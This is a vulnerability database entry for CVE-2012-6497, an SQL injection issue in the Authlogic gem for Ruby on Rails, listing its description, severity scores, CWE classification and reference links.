Vulnerability Details : CVE-2012-6497
The Authlogic gem for Ruby on Rails, when used with certain versions before 3.2.10, makes potentially unsafe find_by_id method calls, which might allow remote attackers to conduct CVE-2012-6496 SQL injection attacks via a crafted parameter in environments that have a known secret_token value, as demonstrated by a value contained in secret_token.rb in an open-source product.
Vulnerability category: Sql Injection
Threat overview for CVE-2012-6497
Top countries where our scanners detected CVE-2012-6497
Top open port discovered on systems with this issue
80
IPs affected by CVE-2012-6497 69
Threat actors abusing to this issue?
Yes
Find out if you* are
affected by CVE-2012-6497!
*Directly or indirectly through your vendors, service providers and 3rd parties.
Powered by
attack surface intelligence
from SecurityScorecard.
Exploit prediction scoring system (EPSS) score for CVE-2012-6497
Probability of exploitation activity in the next 30 days: 0.13%
Percentile, the proportion of vulnerabilities that are scored at or less: ~ 48 % EPSS Score History EPSS FAQ
CVSS scores for CVE-2012-6497
Base Score | Base Severity | CVSS Vector | Exploitability Score | Impact Score | Score Source |
---|---|---|---|---|---|
5.0
|
MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |
10.0
|
2.9
|
NIST |
CWE ids for CVE-2012-6497
-
The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component.Assigned by: nvd@nist.gov (Primary)
References for CVE-2012-6497
-
http://openwall.com/lists/oss-security/2013/01/03/12
oss-security - Re: SQL Injection Vulnerability in Ruby on Rails (CVE-2012-5664)Mailing List;Third Party Advisory
-
http://phenoelit.org/blog/archives/2012/12/21/let_me_github_that_for_you/index.html
Let Me Github That For You | Lands of PacketsBroken Link;Exploit
-
http://www.securityfocus.com/bid/57084
Ruby on Rails Multiple SQL Injection VulnerabilitiesBroken Link;Third Party Advisory;VDB Entry
-
http://blog.phusion.nl/2013/01/03/rails-sql-injection-vulnerability-hold-your-horses-here-are-the-facts/
Database ErrorExploit
Products affected by CVE-2012-6497
- cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:*